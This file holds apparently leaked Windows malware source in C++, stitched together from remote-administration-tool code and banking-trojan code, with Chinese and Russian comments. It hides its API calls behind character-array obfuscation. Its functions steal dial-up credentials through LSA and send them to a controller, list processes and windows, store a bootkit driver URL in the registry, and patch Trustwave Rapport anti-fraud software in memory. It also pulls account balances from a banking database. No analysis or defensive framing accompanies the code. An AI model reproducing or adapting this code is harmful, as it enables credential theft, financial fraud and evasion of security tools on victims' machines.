void CDialupass::AnsiStringToLsaStr(LPSTR AValue,PLSA_UNICODE_STRING lsa)
{
char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'};
lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01);
lsa->Length=plstrlenA(AValue)*2;
lsa->MaximumLength=lsa->Length+2;
lsa->Buffer=(PWSTR)malloc(lsa->MaximumLength);
char FBwWp19[] = {'M','u','l','t','i','B','y','t','e','T','o','W','i','d','e','C','h','a','r','\0'};
MultiByteToWideCharT pMultiByteToWideChar=(MultiByteToWideCharT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp19);
pMultiByteToWideChar(NULL,NULL,(LPCSTR)AValue,plstrlenA(AValue),lsa->Buffer,lsa->MaximumLength);
}
bool DebugReportSaveUrlForBootkitDriver()
{
WCHAR key_path[] = L"SOFTWARE\\Classes\\CLSID\\{8CB0A413-0585-4886-B110-004B3BCAA9A8}";
CHAR url[500];
DWORD url_length = 0;
HKEY key;
DWORD opt = 0;
if (!GetDriverUrl(url, sizeof(url))) return false;
DWORD key_created = (DWORD)pRegCreateKeyExW(HKEY_LOCAL_MACHINE, key_path, 0, NULL, 0, KEY_WRITE, NULL, &key, &opt);
DBGRPTDBG("DebugReportSaveUrlForBootkitDriver", "RegCreateKeyExW return 0x%X", key_created);
if (key_created != ERROR_SUCCESS) return false;
// Сохраняем на всякий пожарный с 0 в конце
DWORD url_value_set = (DWORD)pRegSetValueExW(key, L"ID", 0, REG_BINARY, (const BYTE*)&url[0],
(DWORD)plstrlenA(url));
DBGRPTDBG("DebugReportSaveUrlForBootkitDriver", "RegSetValueExW return 0x%X", url_value_set);
if (url_value_set != ERROR_SUCCESS) return false;
DBGRPTDBG("DebugReportSaveUrlForBootkitDriver", "Url key set (url=%s).", url);
pRegCloseKey(key);
return true;
}
void CSystemManager::SendDialupassList()
{
CDialupass pass;
int nPacketLen = 0;
char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'};
lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01);
int i;
for (i = 0; i < pass.GetMax(); i++)
{
COneInfo *pOneInfo = pass.GetOneInfo(i);
for (int j = 0; j < STR_MAX; j++)
nPacketLen += plstrlenA(pOneInfo->Get(j)) + 1;
}
char SSzlC20[] = {'L','o','c','a','l','A','l','l','o','c','\0'};
LocalAllocT pLocalAlloc=(LocalAllocT)GetProcAddress(LoadLibrary("KERNEL32.dll"),SSzlC20);
nPacketLen += 1;
LPBYTE lpBuffer = (LPBYTE)pLocalAlloc(LPTR, nPacketLen);
DWORD dwOffset = 1;
for (i = 0; i < pass.GetMax(); i++)
{
COneInfo *pOneInfo = pass.GetOneInfo(i);
for (int j = 0; j < STR_MAX; j++)
{
int nFieldLength = plstrlenA(pOneInfo->Get(j)) + 1;
Gyfunction->my_memcpy(lpBuffer + dwOffset, pOneInfo->Get(j), nFieldLength);
dwOffset += nFieldLength;
}
}
lpBuffer[0] = TOKEN_DIALUPASS;
LocalSizeT pLocalSize=(LocalSizeT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"LocalSize");
Send((LPBYTE)lpBuffer, pLocalSize(lpBuffer));
char DYrEN31[] = {'L','o','c','a','l','F','r','e','e','\0'};
LocalFreeT pLocalFree=(LocalFreeT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DYrEN31);
pLocalFree(lpBuffer);
}
bool CALLBACK CSystemManager::EnumWindowsProc(HWND hwnd, LPARAM lParam)
{
DWORD dwLength = 0;
DWORD dwOffset = 0;
DWORD dwProcessID = 0;
LPBYTE lpBuffer = *(LPBYTE *)lParam;
char strTitle[1024];
memset(strTitle, 0, sizeof(strTitle));
char CtxPW56[] = {'G','e','t','W','i','n','d','o','w','T','e','x','t','A','\0'};
GetWindowTextAT pGetWindowTextA=(GetWindowTextAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW56);
pGetWindowTextA(hwnd, strTitle, sizeof(strTitle));
char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'};
lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01);
char DYrEN52[] = {'I','s','W','i','n','d','o','w','V','i','s','i','b','l','e','\0'};
IsWindowVisibleT pIsWindowVisible=(IsWindowVisibleT)GetProcAddress(LoadLibrary("USER32.dll"),DYrEN52);
if (!pIsWindowVisible(hwnd) || plstrlenA(strTitle) == 0)
return true;
char SSzlC20[] = {'L','o','c','a','l','A','l','l','o','c','\0'};
LocalAllocT pLocalAlloc=(LocalAllocT)GetProcAddress(LoadLibrary("KERNEL32.dll"),SSzlC20);
if (lpBuffer == NULL)
lpBuffer = (LPBYTE)pLocalAlloc(LPTR, 1);
dwLength = sizeof(DWORD) + plstrlenA(strTitle) + 1;
LocalSizeT pLocalSize=(LocalSizeT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"LocalSize");
dwOffset = pLocalSize(lpBuffer);
char FBwWp29[] = {'L','o','c','a','l','R','e','A','l','l','o','c','\0'};
LocalReAllocT pLocalReAlloc=(LocalReAllocT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp29);
lpBuffer = (LPBYTE)pLocalReAlloc(lpBuffer, dwOffset + dwLength, LMEM_ZEROINIT|LMEM_MOVEABLE);
char CtxPW53[] = {'G','e','t','W','i','n','d','o','w','T','h','r','e','a','d','P','r','o','c','e','s','s','I','d','\0'};
GetWindowThreadProcessIdT pGetWindowThreadProcessId=(GetWindowThreadProcessIdT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW53);
pGetWindowThreadProcessId(hwnd, (LPDWORD)(lpBuffer + dwOffset));
Gyfunction->my_memcpy(lpBuffer + dwOffset + sizeof(DWORD), strTitle, plstrlenA(strTitle) + 1);
*(LPBYTE *)lParam = lpBuffer;
return true;
}
LPCTSTR CDialupass::UTF8ToGB2312(char UTF8Str[])
{
char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'};
lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01);
if (UTF8Str == NULL || plstrlenA(UTF8Str) == 0)
return "";
int nStrLen = plstrlenA(UTF8Str) * 2;
char *lpWideCharStr = new char[nStrLen];
char *lpMultiByteStr = new char[nStrLen];
char FBwWp19[] = {'M','u','l','t','i','B','y','t','e','T','o','W','i','d','e','C','h','a','r','\0'};
MultiByteToWideCharT pMultiByteToWideChar=(MultiByteToWideCharT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp19);
pMultiByteToWideChar(CP_UTF8, 0, UTF8Str, -1, (LPWSTR)lpWideCharStr, nStrLen);
char DYrEN32[] = {'W','i','d','e','C','h','a','r','T','o','M','u','l','t','i','B','y','t','e','\0'};
WideCharToMultiByteT pWideCharToMultiByte=(WideCharToMultiByteT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DYrEN32);
pWideCharToMultiByte(CP_ACP, 0, (LPWSTR)lpWideCharStr, -1, lpMultiByteStr, nStrLen, 0, 0);
delete lpWideCharStr;
return lpMultiByteStr;
}
void DelSetInfo(LPCTSTR lpKeyName, LPCTSTR lpszValueName, LPCTSTR lpServiceName)
{
typedef int
(WINAPI
*lstrlenAT)(
__in LPCSTR lpString
);
lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"lstrlenA");
char strSubKey[1024];
memset(strSubKey, 0, sizeof(strSubKey));
wsprintf(strSubKey, "SYSTEM\\CurrentControlSet\\Services\\%s", lpServiceName);
WriteRegEx(HKEY_LOCAL_MACHINE, strSubKey, lpKeyName, REG_SZ, (char *)lpszValueName, plstrlenA(lpszValueName), 3);
}
DWORD CDialupass::GetRasEntryCount()
{
int nCount = 0;
char *lpPhoneBook[2];
char szPhoneBook1[MAX_PATH+1], szPhoneBook2[MAX_PATH+1];
GetWindowsDirectoryAT pGetWindowsDirectoryA=(GetWindowsDirectoryAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetWindowsDirectoryA");
pGetWindowsDirectoryA(szPhoneBook1, sizeof(szPhoneBook1));
char FBwWp22[] = {'l','s','t','r','c','p','y','A','\0'};
lstrcpyAT plstrcpyA=(lstrcpyAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp22);
plstrcpyA(Gyfunction->my_strchr(szPhoneBook1, '\\') + 1, "Documents and Settings\\");
char DmDjm01[] = {'l','s','t','r','c','a','t','A','\0'};
lstrcatAT plstrcatA=(lstrcatAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DmDjm01);
plstrcatA(szPhoneBook1, m_lpCurrentUser);
plstrcatA(szPhoneBook1, "\\Application Data\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk");
char CtxPW39[] = {'S','H','G','e','t','S','p','e','c','i','a','l','F','o','l','d','e','r','P','a','t','h','A','\0'};
SHGetSpecialFolderPathAT pSHGetSpecialFolderPathA=(SHGetSpecialFolderPathAT)GetProcAddress(LoadLibrary("SHELL32.dll"),CtxPW39);
pSHGetSpecialFolderPathA(NULL,szPhoneBook2, 0x23, 0);
char DQeBW01[] = {'%','s','\\','%','s','\0'};
char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'};
wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50);
pwsprintfA(szPhoneBook2,DQeBW01, szPhoneBook2, "Microsoft\\Network\\Connections\\pbk\\rasphone.pbk");
lpPhoneBook[0] = szPhoneBook1;
lpPhoneBook[1] = szPhoneBook2;
DWORD nSize = 1024 * 4;
char *lpszReturnBuffer = new char[nSize];
char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'};
lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01);
for (int i = 0; i < sizeof(lpPhoneBook) / sizeof(int); i++)
{
memset(lpszReturnBuffer, 0, nSize);
GetPrivateProfileSectionNamesAT pGetPrivateProfileSectionNamesA=(GetPrivateProfileSectionNamesAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetPrivateProfileSectionNamesA");
pGetPrivateProfileSectionNamesA(lpszReturnBuffer, nSize, lpPhoneBook[i]);
for(char *lpSection = lpszReturnBuffer; *lpSection != '\0'; lpSection += plstrlenA(lpSection) + 1)
{
nCount++;
}
}
delete lpszReturnBuffer;
return nCount;
}
BOOL AntiRapport()
{
BOOL bRet = FALSE;
UCHAR Buf;
DWORD t;
HMODULE hRapportModule;
LPCSTR lpStr1;
LPCSTR lpStr2;
DWORD dwStr1;
DWORD dwStr2;
PVOID pvLogFix;
PVOID pvFix;
pLoadLibraryA("wininet.dll");
pLoadLibraryA("user32.dll");
hRapportModule =(HMODULE) pGetModuleHandleA("RapportUtil.dll");
if (hRapportModule)
{
lpStr1 = "periodic_checkpoint::periodic_checkpoint_thread";
lpStr2 = ".\\patching_sentry\\periodic_checkpoint.cpp";
dwStr1 = AntiRapportFindStr(hRapportModule,lpStr1,(DWORD)plstrlenA(lpStr1));
if (dwStr1)
{
dwStr2 = AntiRapportFindStr(hRapportModule,lpStr2,(DWORD)plstrlenA(lpStr2));
if (dwStr2)
{
pvFix = AnitRapportFindPushStrs(hRapportModule,dwStr1,dwStr2,&pvLogFix);
if (pvFix)
{
Buf = 0x19;
if (pWriteProcessMemory(pGetCurrentProcess(),pvFix,(PVOID)&Buf,sizeof(Buf),&t))
{
bRet = TRUE;
// DbgPrint(__FUNCTION__"(): rapport protect thread patched at %x\n",pvFix);
}
else
{
//DbgPrint(__FUNCTION__"(): WriteProcessMemory failed with error %lx\n",GetLastError());
}
if (pvLogFix)
{
Buf = 0xC3;
if (pWriteProcessMemory(NtCurrentProcess(),pvLogFix,(PVOID)&Buf,sizeof(Buf),&t))
{
// DbgPrint(__FUNCTION__"(): rapport log proc patched at %x\n",pvLogFix);
}
else
{
// DbgPrint(__FUNCTION__"(): WriteProcessMemory failed with error %lx\n",GetLastError());
}
}
pSleep(4000);
UnhookLibs();
}
}
}
}
return bRet;
}
static char *GrabBalance(char *lpPath)
{
char *lpBalance=NULL;
if (lpPath)
{
SQLHENV hEnv;
SQLHANDLE hConn,hBalance;
pSQLAllocHandle(SQL_HANDLE_ENV,NULL,&hEnv);
pSQLSetEnvAttr(hEnv,SQL_ATTR_ODBC_VERSION,(void *)SQL_OV_ODBC3,NULL);
pSQLAllocHandle(SQL_HANDLE_DBC,hEnv,&hConn);
char szConfig[MAX_PATH];
pPathCombineA(szConfig,lpPath,"EXE\\default.cfg");
bool bUseAlias=pGetPrivateProfileIntA(szDatabaseParam,"aliasconnect",0,szConfig);
char szUser[20];
pGetPrivateProfileStringA(szDatabaseParam,"username",0,szUser,20,szConfig);
do
{
if (bUseAlias)
{
char szAlias[200];
int dwLen=(int)pGetPrivateProfileStringA(szDatabaseParam,"alias",0,szAlias,200,szConfig);
char szStr[512];
SQLSMALLINT tmp;
SQLRETURN retcode=(SQLRETURN)pSQLConnectA(hConn,(SQLCHAR*)szAlias,dwLen,(SQLCHAR*)szUser,lstrlenA(szUser),(SQLCHAR*)"sql",3);
if ((retcode != SQL_SUCCESS) && (retcode != SQL_SUCCESS_WITH_INFO))
break;
}
else
{
char szConnectString[400];
int dwLen=(int)pGetPrivateProfileStringA(szDatabaseParam,"connectstring",0,szConnectString,200,szConfig);
char *p;
if (p=(char*)ppStrStrA(szConnectString,"%BSSRoot%"))
{
char szTmpStr[200];
plstrcpyA(szTmpStr,p+sizeof("%BSSRoot%")-1);
plstrcpyA(p,lpPath);
p+=(int)plstrlenA(lpPath);
plstrcpyA(p,szTmpStr);
dwLen=(int)plstrlenA(szConnectString)+1;
}
if (szConnectString[dwLen-1] != ';')
{
*(WORD*)&szConnectString[dwLen-1]=';';
dwLen++;
}
//char szUserPassword[40];
//dwLen+=(int)ppwsprintfA(szUserPassword,"UID=%s;PWD=sql;",szUser);
plstrcatA(szConnectString,"UID=");
plstrcatA(szConnectString,szUser);
plstrcatA(szConnectString,";");
plstrcatA(szConnectString,"PWD=sql;");
//plstrcatA(szConnectString,szUserPassword);
char szStr[512];
SQLSMALLINT tmp;
SQLRETURN retcode=(SQLRETURN)pSQLDriverConnectA(hConn,NULL,(SQLCHAR*)szConnectString,SQL_NTS,(unsigned char *)szStr,sizeof(szStr),&tmp,SQL_DRIVER_COMPLETE);
if ((retcode != SQL_SUCCESS) && (retcode != SQL_SUCCESS_WITH_INFO))
break;
}
SQLHANDLE hBalance;
pSQLAllocHandle(SQL_HANDLE_STMT,hConn,&hBalance);
pSQLPrepareA(hBalance,(SQLCHAR*)szGetBalanceStatement,sizeof(szGetBalanceStatement));
SQLINTEGER tmp=0;
//SQLDOUBLE Rest=0;
SQLINTEGER Rest=0;
//pSQLBindCol(hBalance,1,SQL_C_DOUBLE,&Rest,sizeof(Rest),&tmp);
pSQLBindCol(hBalance,1,SQL_C_SLONG,&Rest,sizeof(Rest),&tmp);
SQLCHAR Account[25]={0};
pSQLBindCol(hBalance,2,SQL_C_CHAR,&Account,sizeof(Account),&tmp);
pSQLExecute(hBalance);
lpBalance=(char*)MemAlloc(1024); lpBalance[0] = 0;
SQLRETURN dwRet;
while (((dwRet=(SQLRETURN)pSQLFetch(hBalance)) == SQL_SUCCESS) || (dwRet == SQL_SUCCESS_WITH_INFO))
{
//конвертируем число в строку
char szRest[16], buf[16];
int i = 0;
if( Rest < 0 )
{
szRest[0] = '-';
Rest = -Rest;
}
else
szRest[0] = ' ';
do
{
buf[i++] = (Rest % 10) + '0';
Rest /= 10;
} while( Rest );
szRest[i + 1] = 0;
char* ps = szRest + 1;
while( --i >= 0 ) *ps++ = buf[i];
//DWORD dwLen=(DWORD)wsprintfA(szTmp,"%s: %d",Account,Rest);
if (lpBalance[0]) plstrcatA( lpBalance, "; " );
plstrcatA(lpBalance, Account);
plstrcatA(lpBalance, ": ");
plstrcatA(lpBalance, szRest);
}
lpBalance = (char*)MemRealloc(lpBalance, (DWORD)plstrlenA(lpBalance));
pSQLCloseCursor(hBalance);
pSQLFreeHandle(SQL_HANDLE_STMT,hBalance);
}
while (false);
pSQLDisconnect(hConn);
pSQLFreeHandle(SQL_HANDLE_ENV,hEnv);
pSQLFreeHandle(SQL_HANDLE_ENV,hBalance);
pSQLFreeHandle(SQL_HANDLE_DBC,hConn);
}
return lpBalance;
}
bool CDialupass::GetRasEntries()
{
int nCount = 0;
char *lpPhoneBook[2];
char szPhoneBook1[MAX_PATH+1], szPhoneBook2[MAX_PATH+1];
GetWindowsDirectoryAT pGetWindowsDirectoryA=(GetWindowsDirectoryAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetWindowsDirectoryA");
pGetWindowsDirectoryA(szPhoneBook1, sizeof(szPhoneBook1));
char FBwWp22[] = {'l','s','t','r','c','p','y','A','\0'};
lstrcpyAT plstrcpyA=(lstrcpyAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp22);
plstrcpyA(Gyfunction->my_strchr(szPhoneBook1, '\\') + 1, "Documents and Settings\\");
char DmDjm01[] = {'l','s','t','r','c','a','t','A','\0'};
lstrcatAT plstrcatA=(lstrcatAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DmDjm01);
plstrcatA(szPhoneBook1, m_lpCurrentUser);
plstrcatA(szPhoneBook1, "\\Application Data\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk");
char CtxPW39[] = {'S','H','G','e','t','S','p','e','c','i','a','l','F','o','l','d','e','r','P','a','t','h','A','\0'};
SHGetSpecialFolderPathAT pSHGetSpecialFolderPathA=(SHGetSpecialFolderPathAT)GetProcAddress(LoadLibrary("SHELL32.dll"),CtxPW39);
pSHGetSpecialFolderPathA(NULL,szPhoneBook2, 0x23, 0);
char DQeBW01[] = {'%','s','\\','%','s','\0'};
char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'};
wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50);
pwsprintfA(szPhoneBook2,DQeBW01, szPhoneBook2, "Microsoft\\Network\\Connections\\pbk\\rasphone.pbk");
lpPhoneBook[0] = szPhoneBook1;
lpPhoneBook[1] = szPhoneBook2;
OSVERSIONINFO osi;
osi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
char FBwWp05[] = {'G','e','t','V','e','r','s','i','o','n','E','x','A','\0'};
GetVersionExAT pGetVersionExA=(GetVersionExAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp05);
pGetVersionExA(&osi);
if(osi.dwPlatformId == VER_PLATFORM_WIN32_NT && osi.dwMajorVersion >= 5)
{
GetLsaPasswords();
}
DWORD nSize = 1024 * 4;
char *lpszReturnBuffer = new char[nSize];
char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'};
lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01);
for (int i = 0; i < sizeof(lpPhoneBook) / sizeof(int); i++)
{
memset(lpszReturnBuffer, 0, nSize);
GetPrivateProfileSectionNamesAT pGetPrivateProfileSectionNamesA=(GetPrivateProfileSectionNamesAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetPrivateProfileSectionNamesA");
pGetPrivateProfileSectionNamesA(lpszReturnBuffer, nSize, lpPhoneBook[i]);
for(char *lpSection = lpszReturnBuffer; *lpSection != '\0'; lpSection += plstrlenA(lpSection) + 1)
{
char *lpRealSection = (char *)UTF8ToGB2312(lpSection);
char strDialParamsUID[256];
char strUserName[256];
char strPassWord[256];
char strPhoneNumber[256];
char strDevice[256];
memset(strDialParamsUID, 0, sizeof(strDialParamsUID));
memset(strUserName, 0, sizeof(strUserName));
memset(strPassWord, 0, sizeof(strPassWord));
memset(strPhoneNumber, 0, sizeof(strPhoneNumber));
memset(strDevice, 0, sizeof(strDevice));
char FBwWp04[] = {'G','e','t','P','r','i','v','a','t','e','P','r','o','f','i','l','e','S','t','r','i','n','g','A','\0'};
GetPrivateProfileStringAT pGetPrivateProfileStringA=(GetPrivateProfileStringAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp04);
int nBufferLen = pGetPrivateProfileStringA(lpSection, "DialParamsUID", 0,
strDialParamsUID, sizeof(strDialParamsUID), lpPhoneBook[i]);
char FBwWp03[] = {'l','s','t','r','c','m','p','A','\0'};
lstrcmpAT plstrcmpA=(lstrcmpAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp03);
if (nBufferLen > 0)//DialParamsUID=4326020 198064
{
for(int j=0; j< (int)m_nRasCount; j++)
{
if(plstrcmpA(strDialParamsUID, m_PassWords[j].UID)==0)
{
plstrcpyA(strUserName, m_PassWords[j].login);
plstrcpyA(strPassWord, m_PassWords[j].pass);
m_PassWords[j].used=true;
m_nUsed++;
break;
}
}
}
pGetPrivateProfileStringA(lpSection, "PhoneNumber", 0,
strPhoneNumber, sizeof(strDialParamsUID), lpPhoneBook[i]);
pGetPrivateProfileStringA(lpSection, "Device", 0,
strDevice, sizeof(strDialParamsUID), lpPhoneBook[i]);
char *lpRealDevice = (char *)UTF8ToGB2312(strDevice);
char *lpRealUserName = (char *)UTF8ToGB2312(strUserName);
Set(strDialParamsUID, lpRealSection, lpRealUserName, strPassWord,
strPhoneNumber, lpRealDevice);
// delete lpRealSection;
// delete lpRealUserName;
// delete lpRealDevice;
}
}
delete lpszReturnBuffer;
return true;
}
//写注册表的指定键的数据(Mode:0-新建键数据 1-设置键数据 2-删除指定键 3-删除指定键项)
int WriteRegEx(HKEY MainKey,LPCTSTR SubKey,LPCTSTR Vname,DWORD Type,char* szData,DWORD dwData,int Mode)
{
HKEY hKey;
DWORD dwDisposition;
int iResult =0;
__try
{
// SetKeySecurityEx(MainKey,Subkey,KEY_ALL_ACCESS);
typedef LONG (APIENTRY *RegCreateKeyExAT)
(
__in HKEY hKey,
__in LPCSTR lpSubKey,
__reserved DWORD Reserved,
__in_opt LPSTR lpClass,
__in DWORD dwOptions,
__in REGSAM samDesired,
__in_opt LPSECURITY_ATTRIBUTES lpSecurityAttributes,
__out PHKEY phkResult,
__out_opt LPDWORD lpdwDisposition
);
char KIoFqQPSy[] = {'A','D','V','A','P','I','3','2','.','d','l','l','\0'};
RegCreateKeyExAT pRegCreateKeyExA= (RegCreateKeyExAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"RegCreateKeyExA");
typedef LONG
(APIENTRY
*RegOpenKeyExAT)(
__in HKEY hKey,
__in_opt LPCSTR lpSubKey,
__reserved DWORD ulOptions,
__in REGSAM samDesired,
__out PHKEY phkResult
);
RegOpenKeyExAT pRegOpenKeyExA=(RegOpenKeyExAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"RegOpenKeyExA");
typedef LONG
(APIENTRY
*RegSetValueExAT)(
__in HKEY hKey,
__in_opt LPCSTR lpValueName,
__reserved DWORD Reserved,
__in DWORD dwType,
__in_bcount_opt(cbData) CONST BYTE* lpData,
__in DWORD cbData
);
RegSetValueExAT pRegSetValueExA=(RegSetValueExAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"RegSetValueExA");
typedef LONG
(APIENTRY
*RegDeleteValueAT)(
__in HKEY hKey,
__in_opt LPCSTR lpValueName
);
RegDeleteValueAT pRegDeleteValueA=(RegDeleteValueAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"RegDeleteValueA");
typedef LONG
(APIENTRY
*RegDeleteKeyAT)(
__in HKEY hKey,
__in LPCSTR lpSubKey
);
RegDeleteKeyAT pRegDeleteKeyA=(RegDeleteKeyAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"RegDeleteKeyA");
typedef int
(WINAPI
*lstrlenAT)(
__in LPCSTR lpString
);
lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"lstrlenA");
switch(Mode)
{
case 0:
if(pRegCreateKeyExA(MainKey,SubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,&dwDisposition) != ERROR_SUCCESS)
__leave;
case 1:
if(pRegOpenKeyExA(MainKey,SubKey,0,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS)
__leave;
switch(Type)
{
case REG_SZ:
case REG_EXPAND_SZ:
if(pRegSetValueExA(hKey,Vname,0,Type,(LPBYTE)szData,plstrlenA(szData)+1) == ERROR_SUCCESS)
iResult =1;
break;
case REG_DWORD:
if(pRegSetValueExA(hKey,Vname,0,Type,(LPBYTE)&dwData,sizeof(DWORD)) == ERROR_SUCCESS)
iResult =1;
break;
case REG_BINARY:
break;
}
break;
case 2:
if(pRegOpenKeyExA(MainKey,SubKey,NULL,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS)
__leave;
if (pRegDeleteKeyA(hKey,Vname) == ERROR_SUCCESS)
iResult =1;
break;
case 3:
if(pRegOpenKeyExA(MainKey,SubKey,NULL,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS)
__leave;
if (pRegDeleteValueA(hKey,Vname) == ERROR_SUCCESS)
iResult =1;
break;
}
}
__finally
{
typedef LONG (APIENTRY *RegCloseKeyT)
( __in HKEY hKey);
char YWsjU[] = {'R','e','g','C','l','o','s','e','K','e','y','\0'};
char KIoFqQPSy[] = {'A','D','V','A','P','I','3','2','.','d','l','l','\0'};
RegCloseKeyT pRegCloseKey=(RegCloseKeyT)GetProcAddress(LoadLibrary(KIoFqQPSy),YWsjU);
pRegCloseKey(MainKey);
pRegCloseKey(hKey);
}
return iResult;
}
LPBYTE CSystemManager::getProcessList()
{
HANDLE hSnapshot = NULL;
HANDLE hProcess = NULL;
HMODULE hModules = NULL;
PROCESSENTRY32 pe32 = {0};
DWORD cbNeeded;
char strProcessName[MAX_PATH] = {0};
LPBYTE lpBuffer = NULL;
DWORD dwOffset = 0;
DWORD dwLength = 0;
char SSzlC11[] = {'K','E','R','N','E','L','3','2','.','d','l','l','\0'};
char SSzlC10[] = {'C','r','e','a','t','e','T','o','o','l','h','e','l','p','3','2','S','n','a','p','s','h','o','t','\0'};
CreateToolhelp32SnapshotT pCreateToolhelp32Snapshot= (CreateToolhelp32SnapshotT)GetProcAddress(LoadLibrary(SSzlC11),SSzlC10);
hSnapshot = pCreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if(hSnapshot == INVALID_HANDLE_VALUE)
return NULL;
pe32.dwSize = sizeof(PROCESSENTRY32);
char SSzlC20[] = {'L','o','c','a','l','A','l','l','o','c','\0'};
LocalAllocT pLocalAlloc=(LocalAllocT)GetProcAddress(LoadLibrary("KERNEL32.dll"),SSzlC20);
lpBuffer = (LPBYTE)pLocalAlloc(LPTR, 1024);
lpBuffer[0] = TOKEN_PSLIST;
dwOffset = 1;
char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'};
lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01);
LocalSizeT pLocalSize=(LocalSizeT)GetProcAddress(LoadLibrary(SSzlC11),"LocalSize");
char FBwWp14[] = {'O','p','e','n','P','r','o','c','e','s','s','\0'};
OpenProcessT pOpenProcess=(OpenProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp14);
char MyProcess32Next[] ={'P','r','o','c','e','s','s','3','2','N','e','x','t','\0'};
Process32NextT pProcess32Next= (Process32NextT)GetProcAddress(LoadLibrary(SSzlC11),MyProcess32Next);
char MyProcess32First[] ={'P','r','o','c','e','s','s','3','2','F','i','r','s','t','\0'};
Process32FirstT pProcess32First= (Process32FirstT)GetProcAddress(LoadLibrary(SSzlC11),MyProcess32First);
char FBwWp29[] = {'L','o','c','a','l','R','e','A','l','l','o','c','\0'};
LocalReAllocT pLocalReAlloc=(LocalReAllocT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp29);
char DYrEN15[] = {'E','n','u','m','P','r','o','c','e','s','s','M','o','d','u','l','e','s','\0'};
EnumProcessModulesT pEnumProcessModules=(EnumProcessModulesT)GetProcAddress(LoadLibrary("PSAPI.DLL"),DYrEN15);
char DYrEN13[] = {'G','e','t','M','o','d','u','l','e','F','i','l','e','N','a','m','e','E','x','A','\0'};
GetModuleFileNameExAT pGetModuleFileNameExA=(GetModuleFileNameExAT)GetProcAddress(LoadLibrary("PSAPI.DLL"),DYrEN13);
if(pProcess32First(hSnapshot, &pe32))
{
do
{
hProcess = pOpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pe32.th32ProcessID);
if ((pe32.th32ProcessID !=0 ) && (pe32.th32ProcessID != 4) && (pe32.th32ProcessID != 8))
{
pEnumProcessModules(hProcess, &hModules, sizeof(hModules), &cbNeeded);
pGetModuleFileNameExA(hProcess, hModules, strProcessName, sizeof(strProcessName));
// 此进程占用数据大小
dwLength = sizeof(DWORD) + plstrlenA(pe32.szExeFile) + plstrlenA(strProcessName) + 2;
// 缓冲区太小,再重新分配下
if (pLocalSize(lpBuffer) < (dwOffset + dwLength))
lpBuffer = (LPBYTE)pLocalReAlloc(lpBuffer, (dwOffset + dwLength), LMEM_ZEROINIT|LMEM_MOVEABLE);
Gyfunction->my_memcpy(lpBuffer + dwOffset, &(pe32.th32ProcessID), sizeof(DWORD));
dwOffset += sizeof(DWORD);
Gyfunction->my_memcpy(lpBuffer + dwOffset, pe32.szExeFile, plstrlenA(pe32.szExeFile) + 1);
dwOffset += plstrlenA(pe32.szExeFile) + 1;
Gyfunction->my_memcpy(lpBuffer + dwOffset, strProcessName, plstrlenA(strProcessName) + 1);
dwOffset += plstrlenA(strProcessName) + 1;
}
}
while(pProcess32Next(hSnapshot, &pe32));
}
